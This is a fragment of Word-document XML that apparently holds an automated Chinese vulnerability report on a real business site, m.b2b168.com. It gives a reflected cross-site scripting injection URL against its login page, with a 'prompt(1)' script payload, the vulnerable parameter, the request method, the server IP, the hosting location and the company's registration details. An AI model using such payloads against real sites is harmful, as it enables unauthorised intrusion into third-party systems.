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注入网址:http://m.b2b168.com/Login.aspx?Url=&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;%3C%2Fscript%3E%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&amp;spm=636936350797320974</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞参数:Url</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>请求方式:POST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4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站主页  http://m.b2b168.com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会员登录 - 八方商务会员管理中心</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>IP__坐标  江西省九江市 电信</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>所属__IP  117.21.178.117</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站年龄  14年9月11天（创建于2004年08月06日,过期时间为2023年08月06日)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案编号  粤ICP备10089450号-8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深圳市八方通科技开发有限公司</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案时间  2018/7/9 0:00:00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>百度收录  1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Microsoft-IIS/7.5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http://m.b2b168.com/Login.aspx?Url=&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;%3C%2Fscript%3E%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&amp;spm=636936350797320974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b2b168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